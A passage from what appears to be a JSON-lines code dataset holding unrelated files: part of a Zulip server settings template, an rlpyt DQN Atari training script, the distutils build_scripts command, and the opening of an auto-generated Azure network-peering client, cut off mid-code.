ADD_TOKENS_TO_NOREPLY_ADDRESS does not exist), as well as for\n# confirmation emails when ADD_TOKENS_TO_NOREPLY_ADDRESS=False.\n#NOREPLY_EMAIL_ADDRESS = 'noreply@example.com'\n\n# Many countries and bulk mailers require certain types of email to display\n# a physical mailing address to comply with anti-spam legislation.\n# Non-commercial and non-public-facing installations are unlikely to need\n# this setting.\n# The address should have no newlines.\n#PHYSICAL_ADDRESS = ''\n\n\n################\n# Authentication settings.\n\n# Enable at least one of the following authentication backends.\n# See https://zulip.readthedocs.io/en/latest/production/authentication-methods.html\n# for documentation on our authentication backends.\n#\n# The install process requires EmailAuthBackend (the default) to be\n# enabled. 
If you want to disable it, do so after creating the\n# initial realm and user.\nAUTHENTICATION_BACKENDS = (\n 'zproject.backends.EmailAuthBackend', # Email and password; just requires SMTP setup\n # 'zproject.backends.GoogleAuthBackend', # Google auth, setup below\n # 'zproject.backends.GitHubAuthBackend', # GitHub auth, setup below\n # 'zproject.backends.AzureADAuthBackend', # Microsoft Azure Active Directory auth, setup below\n # 'zproject.backends.SAMLAuthBackend', # SAML, setup below\n # 'zproject.backends.ZulipLDAPAuthBackend', # LDAP, setup below\n # 'zproject.backends.ZulipRemoteUserBackend', # Local SSO, setup docs on readthedocs\n) # type: Tuple[str, ...]\n\n########\n# Google OAuth.\n#\n# To set up Google authentication, you'll need to do the following:\n#\n# (1) Visit https://console.developers.google.com/ , navigate to\n# \"APIs & Services\" > \"Credentials\", and create a \"Project\" which will\n# correspond to your Zulip instance.\n#\n# (2) Navigate to \"APIs & services\" > \"Library\", and find the\n# \"Identity Toolkit API\". Choose \"Enable\".\n#\n# (3) Return to \"Credentials\", and select \"Create credentials\".\n# Choose \"OAuth client ID\", and follow prompts to create a consent\n# screen. Fill in \"Authorized redirect URIs\" with a value like\n# https://zulip.example.com/accounts/login/google/done/\n# based on your value for EXTERNAL_HOST.\n#\n# (4) You should get a client ID and a client secret. Copy them.\n# Use the client ID as `SOCIAL_AUTH_GOOGLE_KEY` here, and put the\n# client secret in zulip-secrets.conf as `social_auth_google_secret`.\n#SOCIAL_AUTH_GOOGLE_KEY = \n\n########\n# GitHub OAuth.\n#\n# To set up GitHub authentication, you'll need to do the following:\n#\n# (1) Register an OAuth2 application with GitHub at one of:\n# https://github.com/settings/developers\n# https://github.com/organizations/ORGNAME/settings/developers\n# Fill in \"Callback URL\" with a value like\n# https://zulip.example.com/complete/github/ as\n# based on your values for EXTERNAL_HOST and SOCIAL_AUTH_SUBDOMAIN.\n#\n# (2) You should get a page with settings for your new application,\n# showing a client ID and a client secret. Use the client ID as\n# `SOCIAL_AUTH_GITHUB_KEY` here, and put the client secret in\n# zulip-secrets.conf as `social_auth_github_secret`.\n#SOCIAL_AUTH_GITHUB_KEY = \n\n# (3) Optionally, you can configure the GitHub integration to only\n# allow members of a particular GitHub team or organization to log\n# into your Zulip server through GitHub authentication. To enable\n# this, set one of the two parameters below:\n#SOCIAL_AUTH_GITHUB_TEAM_ID = \n#SOCIAL_AUTH_GITHUB_ORG_NAME = \n\n# (4) If you are serving multiple Zulip organizations on different\n# subdomains, you need to set SOCIAL_AUTH_SUBDOMAIN. You can set it\n# to any subdomain on which you do not plan to host a Zulip\n# organization. 
The default recommendation, `auth`, is a reserved\n# subdomain; if you're using this setting, the \"Callback URL\" should be e.g.:\n# https://auth.zulip.example.com/complete/github/\n#\n# If you end up using a subdomain other then the default\n# recommendation, you must also set the 'ROOT_SUBDOMAIN_ALIASES' list\n# to include this subdomain.\n#\n#SOCIAL_AUTH_SUBDOMAIN = 'auth'\n\n########\n# SAML Authentication\n#\n# For SAML authentication, you will need to configure the settings\n# below using information from your SAML Identity Provider, as\n# explained in:\n#\n# https://zulip.readthedocs.io/en/latest/production/authentication-methods.html#saml\n#\n# You will need to modify these SAML settings:\nSOCIAL_AUTH_SAML_ORG_INFO = {\n \"en-US\": {\n \"displayname\": \"Example, Inc. Zulip\",\n \"name\": \"zulip\",\n \"url\": \"%s%s\" % ('https://', EXTERNAL_HOST),\n }\n}\nSOCIAL_AUTH_SAML_ENABLED_IDPS = {\n # The fields are explained in detail here:\n # https://python-social-auth-docs.readthedocs.io/en/latest/backends/saml.html\n \"idp_name\": {\n # Configure entity_id and url according to information provided to you by your IdP:\n \"entity_id\": \"https://idp.testshib.org/idp/shibboleth\",\n \"url\": \"https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO\",\n # The part below corresponds to what's likely referred to as something like\n # \"Attribute Statements\" (with Okta as your IdP) or \"Attribute Mapping\" (with G Suite).\n # The names on the right side need to correspond to the names under which\n # the IdP will send the user attributes. With these defaults, it's expected\n # that the user's email will be sent with the \"email\" attribute name,\n # the first name and the last name with the \"first_name\", \"last_name\" attribute names.\n \"attr_user_permanent_id\": \"email\",\n \"attr_first_name\": \"first_name\",\n \"attr_last_name\": \"last_name\",\n \"attr_username\": \"email\",\n \"attr_email\": \"email\",\n # The \"x509cert\" attribute is automatically read from\n # /etc/zulip/saml/idps/{idp_name}.crt; don't specify it here.\n\n # Optionally, you can edit display_name and display_icon\n # settings below to change the name and icon that will show on\n # the login button.\n \"display_name\": \"SAML\",\n # Path to a square image file containing a logo to appear at\n # the left end of the login/register buttons for this IDP.\n # The default of None results in a text-only button.\n # \"display_icon\": \"/path/to/icon.png\",\n }\n}\n\nSOCIAL_AUTH_SAML_SECURITY_CONFIG = {\n # If you've set up the optional private and public server keys,\n # set this to True to enable signing of SAMLRequests using the\n # private key.\n \"authnRequestsSigned\": False,\n}\n\n# These SAML settings you likely won't need to modify.\nSOCIAL_AUTH_SAML_SP_ENTITY_ID = 'https://' + EXTERNAL_HOST\nSOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {\n \"givenName\": \"Technical team\",\n \"emailAddress\": ZULIP_ADMINISTRATOR,\n}\nSOCIAL_AUTH_SAML_SUPPORT_CONTACT = {\n \"givenName\": \"Support team\",\n \"emailAddress\": ZULIP_ADMINISTRATOR,\n}\n\n########\n# Azure Active Directory OAuth.\n#\n# To set up Microsoft Azure AD authentication, you'll need to do the following:\n#\n# (1) Register an OAuth2 application with Microsoft at:\n# https://apps.dev.microsoft.com\n# Generate a new password under Application Secrets\n# Generate a new platform (web) under Platforms. 
For Redirect URL, enter:\n# https://zulip.example.com/complete/azuread-oauth2/\n# Add User.Read permission under Microsoft Graph Permissions\n#\n# (2) Enter the application ID for the app as SOCIAL_AUTH_AZUREAD_OAUTH2_KEY here\n# (3) Put the application password in zulip-secrets.conf as 'azure_oauth2_secret'.\n#SOCIAL_AUTH_AZUREAD_OAUTH2_KEY = ''\n\n########\n# SSO via REMOTE_USER.\n#\n# If you are using the ZulipRemoteUserBackend authentication backend,\n# set this to your domain (e.g. if REMOTE_USER is \"username\" and the\n# corresponding email address is \"username@example.com\", set\n# SSO_APPEND_DOMAIN = \"example.com\")\nSSO_APPEND_DOMAIN = None # type: Optional[str]\n\n################\n# Miscellaneous settings.\n\n# Support for mobile push notifications. Setting controls whether\n# push notifications will be forwarded through a Zulip push\n# notification bouncer server to the mobile apps. See\n# https://zulip.readthedocs.io/en/latest/production/mobile-push-notifications.html\n# for information on how to sign up for and configure this.\n#PUSH_NOTIFICATION_BOUNCER_URL = 'https://push.zulipchat.com'\n\n# Whether to redact the content of push notifications. This is less\n# usable, but avoids sending message content over the wire. In the\n# future, we're likely to replace this with an end-to-end push\n# notification encryption feature.\n#PUSH_NOTIFICATION_REDACT_CONTENT = False\n\n# Whether to submit basic usage statistics to help the Zulip core team. Details at\n#\n# https://zulip.readthedocs.io/en/latest/production/mobile-push-notifications.html\n#\n# Defaults to True if and only if the Mobile Push Notifications Service is enabled.\n#SUBMIT_USAGE_STATISTICS = True\n\n# Controls whether session cookies expire when the browser closes\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\n\n# Session cookie expiry in seconds after the last page load\nSESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2 # 2 weeks\n\n# Password strength requirements; learn about configuration at\n# https://zulip.readthedocs.io/en/latest/production/security-model.html.\n# PASSWORD_MIN_LENGTH = 6\n# PASSWORD_MIN_GUESSES = 10000\n\n# Controls whether Zulip sends \"new login\" email notifications.\n#SEND_LOGIN_EMAILS = True\n\n# Controls whether or not there is a feedback button in the UI.\nENABLE_FEEDBACK = False\n\n# Feedback sent by your users will be sent to this email address.\nFEEDBACK_EMAIL = ZULIP_ADMINISTRATOR\n\n# Controls whether or not error reports (tracebacks) are emailed to the\n# server administrators.\n#ERROR_REPORTING = True\n# For frontend (JavaScript) tracebacks\n#BROWSER_ERROR_REPORTING = False\n\n# If True, each log message in the server logs will identify the\n# Python module where it came from. Useful for tracking down a\n# mysterious log message, but a little verbose.\n#LOGGING_SHOW_MODULE = False\n\n# If True, each log message in the server logs will identify the\n# process ID. Useful for correlating logs with information from\n# system-level monitoring tools.\n#LOGGING_SHOW_PID = False\n\n# Controls whether or not Zulip will provide inline image preview when\n# a link to an image is referenced in a message. Note: this feature\n# can also be disabled in a realm's organization settings.\n#INLINE_IMAGE_PREVIEW = True\n\n# Controls whether or not Zulip will provide inline previews of\n# websites that are referenced in links in messages. 
Note: this feature\n# can also be disabled in a realm's organization settings.\n#INLINE_URL_EMBED_PREVIEW = True\n\n# Controls whether or not Zulip will parse links starting with\n# \"file:///\" as a hyperlink (useful if you have e.g. an NFS share).\nENABLE_FILE_LINKS = False\n\n# By default, files uploaded by users and profile pictures are stored\n# directly on the Zulip server. You can configure files being instead\n# stored in Amazon S3 or another scalable data store here. See docs at:\n#\n# https://zulip.readthedocs.io/en/latest/production/upload-backends.html\n#\n# If you change LOCAL_UPLOADS_DIR to a different path, you will also\n# need to manually edit Zulip's nginx configuration to use the new\n# path. For that reason, we recommend replacing /home/zulip/uploads\n# with a symlink instead of changing LOCAL_UPLOADS_DIR.\nLOCAL_UPLOADS_DIR = \"/home/zulip/uploads\"\n#S3_AUTH_UPLOADS_BUCKET = \"\"\n#S3_AVATAR_BUCKET = \"\"\n#S3_REGION = \"\"\n\n# Maximum allowed size of uploaded files, in megabytes. DO NOT SET\n# ABOVE 80MB. The file upload implementation doesn't support chunked\n# uploads, so browsers will crash if you try uploading larger files.\n# Set MAX_FILE_UPLOAD_SIZE to 0 to disable file uploads completely\n# (including hiding upload-related options from UI).\nMAX_FILE_UPLOAD_SIZE = 25\n\n# Controls whether name changes are completely disabled for this\n# installation. This is useful when you're syncing names from an\n# integrated LDAP/Active Directory.\nNAME_CHANGES_DISABLED = False\n\n# Controls whether avatar changes are completely disabled for this\n# installation. This is useful when you're syncing avatars from an\n# integrated LDAP/Active Directory.\nAVATAR_CHANGES_DISABLED = False\n\n# Controls whether users who have not uploaded an avatar will receive an avatar\n# from gravatar.com.\nENABLE_GRAVATAR = True\n\n# To override the default avatar image if ENABLE_GRAVATAR is False, place your\n# custom default avatar image at /home/zulip/local-static/default-avatar.png\n# and uncomment the following line.\n#DEFAULT_AVATAR_URI = '/local-static/default-avatar.png'\n\n# To access an external postgres database you should define the host name in\n# REMOTE_POSTGRES_HOST, you can define the password in the secrets file in the\n# property postgres_password, and the SSL connection mode in REMOTE_POSTGRES_SSLMODE\n# Valid values for REMOTE_POSTGRES_SSLMODE are documented in the\n# \"SSL Mode Descriptions\" table in\n# https://www.postgresql.org/docs/9.5/static/libpq-ssl.html\n#REMOTE_POSTGRES_HOST = 'dbserver.example.com'\n#REMOTE_POSTGRES_SSLMODE = 'require'\n\n# If you want to set a Terms of Service for your server, set the path\n# to your markdown file, and uncomment the following line.\n#TERMS_OF_SERVICE = '/etc/zulip/terms.md'\n\n# Similarly if you want to set a Privacy Policy.\n#PRIVACY_POLICY = '/etc/zulip/privacy.md'\n\n\n################\n# Twitter integration.\n\n# Zulip supports showing inline Tweet previews when a tweet is linked\n# to in a message. To support this, Zulip must have access to the\n# Twitter API via OAuth. To obtain the various access tokens needed\n# below, you must register a new application under your Twitter\n# account by doing the following:\n#\n# 1. Log in to http://dev.twitter.com.\n# 2. In the menu under your username, click My Applications. From this page, create a new application.\n# 3. Click on the application you created and click \"create my access token\".\n# 4. 
Fill in the values for twitter_consumer_key, twitter_consumer_secret, twitter_access_token_key,\n# and twitter_access_token_secret in /etc/zulip/zulip-secrets.conf.\n\n\n################\n# Email gateway integration.\n#\n# The Email gateway integration supports sending messages into Zulip\n# by sending an email.\n# For details, see the documentation:\n# https://zulip.readthedocs.io/en/latest/production/settings.html#email-gateway\nEMAIL_GATEWAY_PATTERN = \"\"\n\n# If you are using polling, edit the IMAP settings below:\n#\n# The IMAP login; username here and password as email_gateway_password in\n# zulip-secrets.conf.\nEMAIL_GATEWAY_LOGIN = \"\"\n# The IMAP server & port to connect to\nEMAIL_GATEWAY_IMAP_SERVER = \"\"\nEMAIL_GATEWAY_IMAP_PORT = 993\n# The IMAP folder name to check for emails. All emails sent to EMAIL_GATEWAY_PATTERN above\n# must be delivered to this folder\nEMAIL_GATEWAY_IMAP_FOLDER = \"INBOX\"\n\n\n################\n# LDAP integration.\n#\n# Zulip supports retrieving information about users via LDAP, and\n# optionally using LDAP as an authentication mechanism.\n\nimport ldap\nfrom django_auth_ldap.config import LDAPSearch\n\n########\n# LDAP integration, part 1: Connecting to the LDAP server.\n#\n# For detailed instructions, see the Zulip documentation:\n# https://zulip.readthedocs.io/en/latest/production/authentication-methods.html#ldap\n\n# The LDAP server to connect to. Setting this enables Zulip\n# automatically fetching each new user's name from LDAP.\n# Example: \"ldaps://ldap.example.com\"\nAUTH_LDAP_SERVER_URI = \"\"\n\n# The DN of the user to bind as (i.e., authenticate as) in order to\n# query LDAP. If unset, Zulip does an anonymous bind.\nAUTH_LDAP_BIND_DN = \"\"\n\n# Passwords and secrets are not stored in this file. The password\n# corresponding to AUTH_LDAP_BIND_DN goes in `/etc/zulip/zulip-secrets.conf`.\n# In that file, set `auth_ldap_bind_password`. For example:\n# auth_ldap_bind_password = abcd1234\n\n\n########\n# LDAP integration, part 2: Mapping user info from LDAP to Zulip.\n#\n# For detailed instructions, see the Zulip documentation:\n# https://zulip.readthedocs.io/en/latest/production/authentication-methods.html#ldap\n\n# The LDAP search query to find a given user.\n#\n# The arguments to `LDAPSearch` are (base DN, scope, filter). In the\n# filter, the string `%(user)s` is a Python placeholder. The Zulip\n# server will replace this with the user's Zulip username, i.e. the\n# name they type into the Zulip login form.\n#\n# For more details and alternatives, see the documentation linked above.\nAUTH_LDAP_USER_SEARCH = LDAPSearch(\"ou=users,dc=example,dc=com\",\n ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\")\n\n# Configuration to lookup a user's LDAP data given their email address\n# (For Zulip reverse mapping). If users log in as e.g. \"sam\" when\n# their email address is \"sam@example.com\", set LDAP_APPEND_DOMAIN to\n# \"example.com\". Otherwise, leave LDAP_APPEND_DOMAIN=None and set\n# AUTH_LDAP_REVERSE_EMAIL_SEARCH and AUTH_LDAP_USERNAME_ATTR below.\nLDAP_APPEND_DOMAIN = None # type: Optional[str]\n\n# LDAP attribute to find a user's email address.\n#\n# Leave as None if users log in with their email addresses,\n# or if using LDAP_APPEND_DOMAIN.\nLDAP_EMAIL_ATTR = None # type: Optional[str]\n\n# AUTH_LDAP_REVERSE_EMAIL_SEARCH works like AUTH_LDAP_USER_SEARCH and\n# should query an LDAP user given their email address. 
It and\n# AUTH_LDAP_USERNAME_ATTR are required when LDAP_APPEND_DOMAIN is None.\n#AUTH_LDAP_REVERSE_EMAIL_SEARCH = LDAPSearch(\"ou=users,dc=example,dc=com\",\n#                                            ldap.SCOPE_SUBTREE, \"(email=%(email)s)\")\n\n# AUTH_LDAP_USERNAME_ATTR should be the Zulip username attribute\n# (defined in AUTH_LDAP_USER_SEARCH).\n#AUTH_LDAP_USERNAME_ATTR = \"uid\"\n\n# This map defines how to populate attributes of a Zulip user from LDAP.\n#\n# The format is `zulip_name: ldap_name`; each entry maps a Zulip\n# concept (on the left) to the LDAP attribute name (on the right) your\n# LDAP database uses for the same concept.\nAUTH_LDAP_USER_ATTR_MAP = {\n    # full_name is required; common values include \"cn\" or \"displayName\".\n    # If names are encoded in your LDAP directory as first and last\n    # name, you can instead specify first_name and last_name, and\n    # Zulip will combine those to construct a full_name automatically.\n    \"full_name\": \"cn\",\n    # \"first_name\": \"fn\",\n    # \"last_name\": \"ln\",\n\n    # Profile pictures can be pulled from the LDAP \"thumbnailPhoto\"/\"jpegPhoto\" field.\n    # \"avatar\": \"thumbnailPhoto\",\n\n    # This line is for having Zulip automatically deactivate users\n    # who are disabled in LDAP/Active Directory (and reactivate users who are not).\n    # See docs for usage details and precise semantics.\n    # \"userAccountControl\": \"userAccountControl\",\n}\n\n# Whether to automatically deactivate users not found in LDAP. If LDAP\n# is the only authentication method, then this setting defaults to\n# True. If other authentication methods are enabled, it defaults to\n# False.\n#LDAP_DEACTIVATE_NON_MATCHING_USERS = True\n\n################\n# Miscellaneous settings.\n\n# The default CAMO_URI of '/external_content/' is served by the camo\n# setup in the default Voyager nginx configuration. Setting CAMO_URI\n# to '' will disable the Camo integration.\nCAMO_URI = '/external_content/'\n\n# RabbitMQ configuration\n#\n# By default, Zulip connects to rabbitmq running locally on the machine,\n# but Zulip also supports connecting to RabbitMQ over the network;\n# to use a remote RabbitMQ instance, set RABBITMQ_HOST to the hostname here.\n# RABBITMQ_HOST = \"127.0.0.1\"\n# To use a RabbitMQ user other than the default 'zulip', set RABBITMQ_USERNAME here.\n# RABBITMQ_USERNAME = 'zulip'\n\n# Memcached configuration\n#\n# By default, Zulip connects to memcached running locally on the machine,\n# but Zulip also supports connecting to memcached over the network;\n# to use a remote Memcached instance, set MEMCACHED_LOCATION here.\n# Format HOST:PORT\n# MEMCACHED_LOCATION = 127.0.0.1:11211\n\n# Redis configuration\n#\n# By default, Zulip connects to redis running locally on the machine,\n# but Zulip also supports connecting to redis over the network;\n# to use a remote Redis instance, set REDIS_HOST here.\n# REDIS_HOST = '127.0.0.1'\n# For a different redis port, set REDIS_PORT here.\n# REDIS_PORT = 6379\n# If you set redis_password in zulip-secrets.conf, Zulip will use that password\n# to connect to the redis server.\n\n# Controls whether Zulip will rate-limit user requests.\n# RATE_LIMITING = True\n\n# By default, Zulip connects to the thumbor (the thumbnailing software\n# we use) service running locally on the machine. If you're running\n# thumbor on a different server, you can configure that by setting\n# THUMBOR_URL here. 
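For example, if thumbor ran on a dedicated host, you might use\n# something like THUMBOR_URL = 'http://thumbor.internal.example.com:9995'\n# (a hypothetical address). 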
Setting THUMBOR_URL='' will let Zulip server know that\n# thumbor is not running or configured.\n#THUMBOR_URL = 'http://127.0.0.1:9995'\n#\n# This setting controls whether images shown in Zulip's inline image\n# previews should be thumbnailed by thumbor, which saves bandwidth but\n# can modify the image's appearance.\n#THUMBNAIL_IMAGES = True\n\n# Controls the Jitsi Meet video call integration. By default, the\n# integration uses the SaaS meet.jit.si server. You can specify\n# your own Jitsi Meet server, or if you'd like to disable the\n# integration, set JITSI_SERVER_URL = None.\n#JITSI_SERVER_URL = 'jitsi.example.com'\n"} {"ext": "py", "sha": "1a2fc8666597869658455165ed41e12d1dcdac07", "content": "\n\"\"\"\nRuns one instance of the Atari environment and optimizes using DQN algorithm.\nCan use a GPU for the agent (applies to both sample and train). No parallelism\nemployed, so everything happens in one python process; can be easier to debug.\n\nThe kwarg snapshot_mode=\"last\" to logger context will save the latest model at\nevery log point (see inside the logger for other options).\n\nIn viskit, whatever (nested) key-value pairs appear in config will become plottable\nkeys for showing several experiments. If you need to add more after an experiment, \nuse rlpyt.utils.logging.context.add_exp_param().\n\n\"\"\"\n\nfrom rlpyt.samplers.serial.sampler import SerialSampler\nfrom rlpyt.envs.atari.atari_env import AtariEnv, AtariTrajInfo\nfrom rlpyt.algos.dqn.dqn import DQN\nfrom rlpyt.agents.dqn.atari.atari_dqn_agent import AtariDqnAgent\nfrom rlpyt.runners.minibatch_rl import MinibatchRlEval\nfrom rlpyt.utils.logging.context import logger_context\nfrom polyaxon_client.tracking import get_outputs_path\n\n\n\ndef build_and_train(game=\"pong\", run_ID=0, cuda_idx=None):\n sampler = SerialSampler(\n EnvCls=AtariEnv,\n TrajInfoCls=AtariTrajInfo, # default traj info + GameScore\n env_kwargs=dict(game=game),\n eval_env_kwargs=dict(game=game),\n batch_T=4, # Four time-steps per sampler iteration.\n batch_B=1,\n max_decorrelation_steps=0,\n eval_n_envs=10,\n eval_max_steps=int(10e3),\n eval_max_trajectories=5,\n )\n algo = DQN(min_steps_learn=1e3) # Run with defaults.\n agent = AtariDqnAgent()\n runner = MinibatchRlEval(\n algo=algo,\n agent=agent,\n sampler=sampler,\n n_steps=50e6,\n log_interval_steps=1e3,\n affinity=dict(cuda_idx=cuda_idx),\n )\n config = dict(game=game)\n name = \"dqn_\" + game\n #log_dir = \"example_1\"\n log_dir = get_outputs_path()\n with logger_context(log_dir, run_ID, name, config, snapshot_mode=\"last\"):\n runner.train()\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--game', help='Atari game', default='pong')\n parser.add_argument('--run_ID', help='run identifier (logging)', type=int, default=0)\n parser.add_argument('--cuda_idx', help='gpu to use ', type=int, default=1)\n args = parser.parse_args()\n build_and_train(\n game=args.game,\n run_ID=args.run_ID,\n cuda_idx=args.cuda_idx,\n )\n"} {"ext": "py", "sha": "1a2fc8b876c35404d5fc43bc110195fcfed87476", "content": "\"\"\"distutils.command.build_scripts\n\nImplements the Distutils 'build_scripts' command.\"\"\"\n\n__revision__ = \"$Id: build_scripts.py 77704 2010-01-23 09:23:15Z tarek.ziade $\"\n\nimport os, re\nfrom stat import ST_MODE\nfrom distutils.core import Command\nfrom distutils.dep_util import newer\nfrom distutils.util import convert_path\nfrom distutils import log\n\n# check if Python is called 
on the first line with this expression\nfirst_line_re = re.compile('^#!.*python[0-9.]*([ \\t].*)?$')\n\nclass build_scripts (Command):\n\n description = \"\\\"build\\\" scripts (copy and fixup #! line)\"\n\n user_options = [\n ('build-dir=', 'd', \"directory to \\\"build\\\" (copy) to\"),\n ('force', 'f', \"forcibly build everything (ignore file timestamps\"),\n ('executable=', 'e', \"specify final destination interpreter path\"),\n ]\n\n boolean_options = ['force']\n\n\n def initialize_options (self):\n self.build_dir = None\n self.scripts = None\n self.force = None\n self.executable = None\n self.outfiles = None\n\n def finalize_options (self):\n self.set_undefined_options('build',\n ('build_scripts', 'build_dir'),\n ('force', 'force'),\n ('executable', 'executable'))\n self.scripts = self.distribution.scripts\n\n def get_source_files(self):\n return self.scripts\n\n def run (self):\n if not self.scripts:\n return\n self.copy_scripts()\n\n\n def copy_scripts (self):\n \"\"\"Copy each script listed in 'self.scripts'; if it's marked as a\n Python script in the Unix way (first line matches 'first_line_re',\n ie. starts with \"\\#!\" and contains \"python\"), then adjust the first\n line to refer to the current Python interpreter as we copy.\n \"\"\"\n _sysconfig = __import__('sysconfig')\n self.mkpath(self.build_dir)\n outfiles = []\n for script in self.scripts:\n adjust = 0\n script = convert_path(script)\n outfile = os.path.join(self.build_dir, os.path.basename(script))\n outfiles.append(outfile)\n\n if not self.force and not newer(script, outfile):\n log.debug(\"not copying %s (up-to-date)\", script)\n continue\n\n # Always open the file, but ignore failures in dry-run mode --\n # that way, we'll get accurate feedback if we can read the\n # script.\n try:\n f = open(script, \"r\")\n except IOError:\n if not self.dry_run:\n raise\n f = None\n else:\n first_line = f.readline()\n if not first_line:\n self.warn(\"%s is an empty file (skipping)\" % script)\n continue\n\n match = first_line_re.match(first_line)\n if match:\n adjust = 1\n post_interp = match.group(1) or ''\n\n if adjust:\n log.info(\"copying and adjusting %s -> %s\", script,\n self.build_dir)\n if not self.dry_run:\n outf = open(outfile, \"w\")\n if not _sysconfig.is_python_build():\n outf.write(\"#!%s%s\\n\" %\n (self.executable,\n post_interp))\n else:\n outf.write(\"#!%s%s\\n\" %\n (os.path.join(\n _sysconfig.get_config_var(\"BINDIR\"),\n \"python%s%s\" % (_sysconfig.get_config_var(\"VERSION\"),\n _sysconfig.get_config_var(\"EXE\"))),\n post_interp))\n outf.writelines(f.readlines())\n outf.close()\n if f:\n f.close()\n else:\n if f:\n f.close()\n self.copy_file(script, outfile)\n\n if os.name == 'posix':\n for file in outfiles:\n if self.dry_run:\n log.info(\"changing mode of %s\", file)\n else:\n oldmode = os.stat(file)[ST_MODE] & 07777\n newmode = (oldmode | 0555) & 07777\n if newmode != oldmode:\n log.info(\"changing mode of %s from %o to %o\",\n file, oldmode, newmode)\n os.chmod(file, newmode)\n\n # copy_scripts ()\n\n# class build_scripts\n"} {"ext": "py", "sha": "1a2fc8c2af2a2668dba79d4cb1d14088e7ae64ca", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\nfrom typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union\nimport warnings\n\nfrom azure.core.async_paging import AsyncItemPaged, AsyncList\nfrom azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error\nfrom azure.core.pipeline import PipelineResponse\nfrom azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest\nfrom azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod\nfrom azure.mgmt.core.exceptions import ARMErrorFormat\nfrom azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling\n\nfrom ... import models\n\nT = TypeVar('T')\nClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]\n\nclass VirtualNetworkPeeringsOperations:\n \"\"\"VirtualNetworkPeeringsOperations async operations.\n\n You should not instantiate this class directly. Instead, you should create a Client instance that\n instantiates it for you and attaches it as an attribute.\n\n :ivar models: Alias to model classes used in this operation group.\n :type models: ~azure.mgmt.network.v2020_03_01.models\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An object model deserializer.\n \"\"\"\n\n models = models\n\n def __init__(self, client, config, serializer, deserializer) -> None:\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n self._config = config\n\n async def _delete_initial(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n **kwargs\n ) -> None:\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self._delete_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'virtualNetworkName': self._serialize.url(\"virtual_network_name\", virtual_network_name, 'str'),\n 'virtualNetworkPeeringName': self._serialize.url(\"virtual_network_peering_name\", virtual_network_peering_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.delete(url, query_parameters, header_parameters)\n pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 202, 204]:\n map_error(status_code=response.status_code, 
response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if cls:\n return cls(pipeline_response, None, {})\n\n _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'} # type: ignore\n\n async def begin_delete(\n self,\n resource_group_name: str,\n virtual_network_name: str,\n virtual_network_peering_name: str,\n **kwargs\n ) -> AsyncLROPoller[None]:\n \"\"\"Deletes the specified virtual network peering.\n\n :param resource_group_name: The name of the resource group.\n :type resource_group_name: str\n :param virtual_network_name: The name of the virtual network.\n :type virtual_network_name: str\n :param virtual_network_peering_name: The name of the virtual network peering.\n :type virtual_network_peering_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)\n :rtype: ~azure.core.polling.AsyncLROPoller[None]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = await self._delete_initial(\n resource_group_name=resource_group_name,\n virtual_network_name=virtual_network_name,\n virtual_network_peering_name=virtual_network_peering_name,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n if cls:\n return cls(pipeline_response, None, {})\n\n if polling is True: polling_method = 